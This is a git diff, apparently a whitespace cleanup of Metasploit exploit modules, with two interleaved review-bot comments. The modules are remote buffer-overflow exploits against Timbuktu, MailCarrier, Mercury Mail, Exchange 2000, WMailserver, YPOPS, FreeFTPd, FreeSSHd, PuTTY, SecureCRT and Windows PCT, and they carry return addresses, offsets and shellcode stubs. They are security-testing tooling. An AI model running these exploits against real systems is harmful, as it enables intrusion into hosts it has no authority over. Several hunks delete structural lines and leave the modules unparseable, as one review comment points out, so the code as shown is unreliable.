@@ -9,30 +13,30 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 - in a pretty novel way. - - This exploit requires two connections. The first connection is used to leak stack data + This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 + in a pretty novel way. + + This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial - request with leaked stack data. Using this data allows for reliable exploitation of the - buffer overflow vulnerability. - + request with leaked stack data. Using this data allows for reliable exploitation of the + buffer overflow vulnerability. + Props to Infamous41d for helping in finding this exploitation path. - - The second connection utilizes the data from the data leak to accurately exploit + + The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability. - - TODO: - hdm suggested using meterpreter's migration capability and restarting the process - for multishot exploitation. + + TODO: + hdm suggested using meterpreter's migration capability and restarting the process + for multishot exploitation. }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, 
@@ -57,11 +61,11 @@ class Metasploit3 < Msf::Exploit::Remote [ # we use a memory leak technique to get the return address # tested on Windows XP SP2/SP3 may require a bit more testing - [ 'Automatic Targeting', + [ 'Automatic Targeting', { # ntdll .data (a fairly reliable address) # this address should be relatively stable across platforms/SPs - 'Writable' => 0x7C97B0B0 + 0x10 - 0xc + 'Writable' => 0x7C97B0B0 + 0x10 - 0xc } ], ], @@ -72,23 +76,23 @@ class Metasploit3 < Msf::Exploit::Remote # we make two connections this code just wraps the process - def smb_connection + def smb_connection connect() smb_login() - + print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe") - + pipe = simple.create_pipe('\\PlughNTCommand') - + fid = pipe.file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '') - + return pipe end - - + + def mem_leak pipe = smb_connection() @@ -96,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Constructing memory leak...") writable_addr = target['Writable'] - + buf = make_nops(114) buf[0] = "3 " # specifies the command buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code @@ -106,21 +110,21 @@ class Metasploit3 < Msf::Exploit::Remote pipe.write(buf) leaked = pipe.read() leaked << pipe.read() - + if (leaked.length < 0x1ff8) print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes") pipe.close disconnect - return + return end offset = 0x1d64 stackaddr = leaked[offset, 4].unpack('V')[0] bufaddr = stackaddr - 0xcc8 - + print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}" - + print_status("Closing connection...") pipe.close disconnect diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 510f3101ab..fa3de5d028 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb 
+++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -14,18 +14,17 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::Remote::Tcp - def initialize(info = {}) - super(update_info(info, + def initialize(info = {}) + super(update_info(info, 'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow', 'Description' => %q{ - This module exploits the MailCarrier v2.51 suite SMTP service. - The stack is overwritten when sending an overly long EHLO command. + This module exploits the MailCarrier v2.51 suite SMTP service. + The stack is overwritten when sending an overly long EHLO command. }, - 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], - 'Arch' => [ ARCH_X86 ], + 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => 
@@ -34,54 +33,55 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '11174' ], [ 'BID', '11535' ], [ 'URL', 'http://milw0rm.com/exploits/598' ], - ], + ], + 'Platform' => ['win'], + 'Arch' => [ ARCH_X86 ], 'Privileged' => true, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => - { + { 'Space' => 300, 'BadChars' => "\x00\x0a\x0d:", 'StackAdjustment' => -3500, }, - 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en. - [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1 - [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en - ], + [ + # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en. + [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1 + [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en + ], 'DisclosureDate' => 'Oct 26 2004', 'DefaultTarget' => 0)) - - register_options( + + register_options( [ Opt::RPORT(25), Opt::LHOST(), # Required for stack offset ], self.class) end - def check + def check connect banner = sock.get_once(-1,3) disconnect if (banner =~ /ESMTP TABS Mail Server for Windows NT/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end def exploit connect - + sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars) sploit << [target['Ret']].pack('V') + payload.encoded - + sock.put(sploit + "\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 9f4457f4b1..fc8d96a8ac 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Mercury Mail Transport System 4.51. + This module exploits a stack overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code. }, 
@@ -44,40 +42,40 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 600, 'BadChars' => "\x00\x0a\x0d\x20\x25", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll + [ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 18 2007')) - register_options([ Opt::RPORT(25) ], self.class) + register_options([ Opt::RPORT(25) ], self.class) end def exploit connect - sock.get_once + sock.get_once sock.put("EHLO\r\n") - sock.get_once - + sock.get_once + sock.put("AUTH CRAM-MD5\r\n") sock.get_once sleep(0.25) - - buffer = rand_text_alpha_upper(204) + [target.ret].pack('V') + + buffer = rand_text_alpha_upper(204) + [target.ret].pack('V') buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length) - + sploit = Rex::Text.encode_base64(buffer) - - print_status("Trying target #{target.name}...") + + print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 887fccb118..088f20f25f 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
@@ -17,20 +17,21 @@ class Metasploit3 < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow', 'Description' => %q{ - This is an exploit for the Exchange 2000 heap overflow. Due + This is an exploit for the Exchange 2000 heap overflow. Due to the nature of the vulnerability, this exploit is not very reliable. This module has been tested against Exchange 2000 SP0 and SP3 running a Windows 2000 system patched to SP4. It normally takes between one and 100 connection attempts to successfully obtain a shell. This exploit is *very* unreliable. }, - 'Author' => [ - 'hdm', # original module - 'patrick', # msf3 port :) - ], + 'Author' => + [ + 'hdm', # original module + 'patrick', # msf3 port :) + ], 'Version' => '$Revision$', 'References' => [ @@ -52,14 +53,14 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x20:=+\x22", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ [ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 15 2003')) - register_options( + register_options( [ Opt::RPORT(25), OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']), @@ -67,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]), ]) end - + def check connect banner = sock.get_once - + if (banner !~ /Microsoft/) print_status("Target does not appear to be an Exchange server.") return Exploit::CheckCode::Safe @@ -85,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n") res = sock.get_once - + if (res =~ /Sender OK/) sock.put("RCPT TO: #{datastore['MAILTO']}\r\n") res = sock.get_once 
@@ -100,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end end end - + disconnect end @@ -142,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote begin if (count > datastore['ATTEMPTS']) - print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.") + print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.") return # Stop after a specified number of attempts. end @@ -214,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - rescue + rescue print_status("Unable to connect or Exchange has crashed... Retrying.") count += 1 retry diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index d101ea31a8..49b966b96a 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,11 +18,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in SoftiaCom WMailserver 1.0 - (SMTP) via a SEH frame overwrite. + This module exploits a stack overflow in SoftiaCom WMailserver 1.0 + (SMTP) via a SEH frame overwrite. }, 'Author' => [ 'MC' ], 'Version' => '$Revision$', 
@@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x20", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], @@ -54,19 +52,19 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 11 2005 ')) - register_options([ Opt::RPORT(25) ], self.class) + register_options([ Opt::RPORT(25) ], self.class) end def exploit connect - + filler = " " + rand_text_alpha_upper(5115) seh = generate_seh_payload(target.ret) - sploit = filler + seh + rand_text_alpha_upper(200) - - print_status("Trying target #{target.name}...") + sploit = filler + seh + rand_text_alpha_upper(200) + + print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index b186a7d70e..b647e438e4 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb 
@@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'YPOPS 0.6 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the YPOPS POP3 + This module exploits a stack overflow in the YPOPS POP3 service. This is a classic stack overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll - }, 'Author' => [ 'acaro <acaro@jervus.it>' ], 'Version' => '$Revision$', @@ -38,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '10367'], [ 'BID', '11256'], [ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'], - ], 'Platform' => 'win', 'Privileged' => false, @@ -47,9 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1200, 'BadChars' => "\x00\x25", 'MinNops' => 106, - }, - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ], [ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ], @@ -85,16 +80,16 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - pattern = + pattern = rand_text_alpha(target['Offset'] - payload.encoded.length) + payload.encoded + - [target.ret].pack('V') + + [target.ret].pack('V') + "\n" print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}") sock.put(pattern) - + handler disconnect end 
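Review bot: The new side of the ypops hunks deletes structural lines that get no `+` counterpart: the `},` that closes the `%q{` description (`@@ -3,32 +3,29 @@`), the `],` that closes `'References'` (`@@ -38,7 +35,6 @@`) and the `},` that closes the `'Payload'` hash (`@@ -47,9 +43,8 @@`); the hunk line counts agree with the deletions, so unless the rendering lost `+` lines this module no longer parses. The same pattern recurs in the freeftpd_key_exchange, freesshd_key_exchange and tftpd32_long_filename hunks, which drop `'Targets' =>`, `'Privileged' => true,`, `'DisclosureDate' => …` and the closing `))` of `super(update_info(info, …`, and in the futuresoft_transfermode and quick_tftp_pro_mode hunks, which additionally drop `'Platform' => 'win',`. A whitespace-only cleanup should not change the line count of these declarations; restore each removed line in place, reindented to the new style, and load every touched module once before merging so a parse failure is caught rather than discovered at runtime.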
diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index 5e8d533039..9e13ec0371 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in FreeFTPd 1.0.10 + This module exploits a simple stack overflow in FreeFTPd 1.0.10 This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This module is based on MC's freesshd_key_exchange exploit. @@ -30,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'riaf [at] mysec.org', 'License' => BSD_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-2407'], ['OSVDB', '25569'], ['BID', '17958'], 
@@ -47,42 +45,40 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x750231e2 } ], [ 'Windows 2000 SP0-SP4 German', { 'Ret' => 0x74f931e2 } ], [ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1d54 } ], - [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], + [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'May 12 2006', - 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(22) ], self.class) - + register_options( + [ + Opt::RPORT(22) + ], self.class) end def exploit connect - sploit = "SSH-2.0-OpenSSH_3.9p1" + sploit = "SSH-2.0-OpenSSH_3.9p1" sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00" sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V') sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n" - + res = sock.recv(40) - if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/) - print_status("Trying target #{target.name}...") - sock.put(sploit) - else - print_status("Not running a vulnerable version...") - end - + if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/) + print_status("Trying target #{target.name}...") + sock.put(sploit) + else + print_status("Not running a vulnerable version...") + end + handler disconnect diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 351d1adf2f..8a31d4688a 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in FreeSSHd 1.0.9. + This module exploits a simple stack overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-2407'], ['OSVDB', '25463'], ['BID', '17958'], 
@@ -46,41 +44,39 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e51877 } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'May 12 2006', - 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(22) ], self.class) - + register_options( + [ + Opt::RPORT(22) + ], self.class) end def exploit connect - sploit = "SSH-2.0-OpenSSH_3.9p1" + sploit = "SSH-2.0-OpenSSH_3.9p1" sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00" sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V') sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n" - + res = sock.recv(22) - if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/) - print_status("Trying target #{target.name}...") - sock.put(sploit) - else - print_status("Not running a vulnerable version...") - end - + if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/) + print_status("Trying target #{target.name}...") + sock.put(sploit) + else + print_status("Not running a vulnerable version...") + end + handler disconnect diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index ce90cd9938..f1c05d3137 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
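Review bot: The re-indented banner check `if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)` leaves the dots unescaped, so each `.` matches any character and the version test is looser than it reads; the sibling freeftpd_key_exchange hunk escapes them, so the consistent form is `if ( res =~ /SSH-2\.0-WeOnlyDo 1\.2\.7/)`. If the original author meant the loose match, a short comment saying so would stop the next cleanup from "fixing" it. The closing `end` of `exploit` is outside this hunk.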
@@ -20,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PuTTy.exe <= v0.53 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the PuTTY SSH client that is triggered + This module exploits a buffer overflow in the PuTTY SSH client that is triggered through a validation error in SSH.c. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2002-1359' ], [ 'OSVDB', '8044'], [ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ], @@ -56,13 +54,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "SSH-2.0-OpenSSH_3.6.1p2\r\n" + diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 4f8b20aa29..6a9c5cc8be 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -20,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in SecureCRT <= 4.0 + This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. @@ -30,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2002-1059' ], [ 'OSVDB', '4991' ], [ 'BID', '5287' ], @@ -57,13 +55,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243) buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 3cc050c13f..f7fe72a825 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Private Communications Transport Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Microsoft + This module exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack. This code is based on Johnny Cyberpunk's THC release and has been tested against Windows 2000 and Windows XP. To use this module, specify the remote @@ -35,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). Using the wrong target may not result in an immediate crash of the remote system. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 
@@ -59,72 +56,72 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 SP4', { 'Platform' => 'win', 'Ret' => 0x67419ce8, # jmp [esp + 0x6c] }, ], - [ + [ 'Windows 2000 SP3', { 'Platform' => 'win', 'Ret' => 0x67419e1d, # jmp [esp + 0x6c] }, - ], - [ + ], + [ 'Windows 2000 SP2', { 'Platform' => 'win', 'Ret' => 0x6741a426, # jmp [esp + 0x6c] }, ], - [ + [ 'Windows 2000 SP1', { 'Platform' => 'win', 'Ret' => 0x77e4f44d, # jmp [ebx + 0x14] }, ], - [ + [ 'Windows 2000 SP0', { 'Platform' => 'win', 'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e] }, ], - [ + [ 'Windows XP SP0', { 'Platform' => 'win', 'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c] }, ], - [ + [ 'Windows XP SP1', { 'Platform' => 'win', 'Ret' => 0x0ffb832f, # jmp [esp + 0x6c] }, - ], + ], ], 'DisclosureDate' => 'Apr 13 2004', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"]) - ], self.class) + + register_options( + [ + OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"]) + ], self.class) end def exploit connect - + print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...") - + # This is a heap ptr to the ssl request # ... and just happens to not die ... # Thanks to CORE and Halvar 
@@ -134,35 +131,35 @@ class Metasploit3 < Msf::Exploit::Remote # 0016 => add [esi], dl # 8f8201000000 => pop [esi+1] # eb0f => jmp short 11 to shellcode - + buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+ "\xeb\x0f" + 'XXXXXXXXXXX' + [target.ret ^ 0xffffffff].pack('V')+ payload.encoded - + # Connect to a SMTP service, call STARTTLS if (datastore['PROTO'] == 'smtp') greeting = sock.get_once sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n") resp = sock.get_once - + sock.put("STARTTLS\r\n") resp = sock.get_once - + if (resp and resp !~ /^220/) print_status("Warning: this server may not support STARTTLS") end - + end - + sock.put(buf) resp = sock.get_once - + if (resp == "\x00\x00\x01") print_status("The response indicates that the PCT protocol is disabled") end - + handler disconnect end diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index f0f3f3e86b..9917437efc 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb 
